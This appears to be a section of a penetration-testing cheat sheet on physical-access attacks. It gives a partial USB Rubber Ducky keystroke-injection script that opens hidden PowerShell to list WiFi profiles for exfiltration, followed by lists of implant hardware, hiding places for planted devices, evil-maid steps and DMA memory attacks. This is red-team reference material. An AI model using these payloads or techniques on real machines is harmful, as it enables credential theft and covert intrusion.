Physical Device Attacks
Exploitation
Once physical access is gained, attackers can plant rogue devices, steal data from unattended machines, or compromise hardware.
bash
# USB Rubber Ducky / Bash Bunny attacks
# Keystroke injection - acts as keyboard
# Example Ducky Script (exfiltrate WiFi passwords)
DELAY 1000
GUI r
DELAY 500
STRING powershell -w hidden
ENTER
DELAY 1000
STRING (netsh wlan show profiles) | Select-String ":(.+)$"
ENTER
# ... continues with exfiltration
# USB Implants
# - O.MG Cable (looks like charging cable)
# - USBKill (fries USB ports)
# - Keylogger (hardware inline)
# - WiFi Pineapple Nano (wireless attacks)
# Raspberry Pi Zero as attack platform
# Configure as USB Ethernet gadget
# Run Responder for credential capture
# P4wnP1 - Turn Pi Zero into attack tool
# Network Implants
# - LAN Turtle (covert network access)
# - Throwing Star LAN Tap (passive sniffing)
# - Shark Jack (automated network attacks)
# Planting Devices - Concealment
# - Inside power strips
# - Behind monitors
# - Under desks
# - In ceiling tiles
# - Inside conference room equipment
# - Attached to network drops
# Evil Maid Attack (unattended laptop)
# Boot from USB
# Modify boot partition
# Install keylogger/backdoor
# Or dump memory/credentials
# DMA Attacks (Thunderbolt/PCIe)
# PCILeech with FPGA
# Can read/write physical memory
# Bypass full disk encryption on running systems